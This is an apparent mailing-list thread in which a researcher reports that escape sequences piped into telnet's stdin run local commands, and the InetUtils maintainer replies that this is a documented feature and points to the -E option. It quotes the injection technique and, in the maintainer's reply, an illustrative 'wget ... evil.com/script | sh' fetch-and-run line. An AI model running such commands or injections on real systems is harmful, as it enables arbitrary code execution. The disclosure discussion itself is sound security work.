Hi Simon, I know this is a "feature", but connecting the stdin of telnet with any kind of controllable input, will rely en command execution, is a danger default option.
I have also another vulnerability related with stdin parser, is a SIGSEGV, i'm studying if I can control the movl to overwrite a memory function pointer in order to get execution, But also the attack vector is stdin, then the attack vector is "rare" regards. 2011/10/3 Simon Josefsson <[email protected]> > sha0 <[email protected]> writes: > > > Hello, > > > > Is posible to inject a scape sequence via stdin to telnet, and arbitrary > > comands will be executed, > > Hi! Thanks for studying InetUtils for security problems. I'm not sure > I follow your "attack" though. > > > for example: > > > > > > # cat evil-file | telnet 127.0.0.1 80 > > Trying 127.0.0.1... > > Connected to 127.0.0.1. > > Escape character is '^]'. > > > > telnet> !id > > uid=0(root) gid=0(root) > > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1 > > 0(wheel),19(log) > > Connection closed by foreign host. > > > > > > I think is very dangerous despite of few admins use telnet for moving > file > > like this > > Yes it is dangerous, so don't do that. Use ftp to transfer files. > > > 3. DESCRIPTION > > ------------------------- > > When telnet is used to transfer files to remote tcp port, a very > dangerous > > vulnerability is present, that lets a remote arbitrary code execution. > > The attack seems to be based on tricking the local root user into doing > something stupid. This is similar to asking the local root user to do > 'wget -O - http://evil.com/script | sh'. There is no security bug in > wget or sh just because that is possible. > > > 7. SOLUTION > > ------------------------- > > The stdin parser must filter the 0x9d byte. > > The ^] escape sequence is a documented feature, so I don't think that is > a solution. > > You can use the command line parameter -E to inhibit the escape > character if you want. Quoting 'telnet --help': > > -E, --no-escape use no escape character > > /Simon >
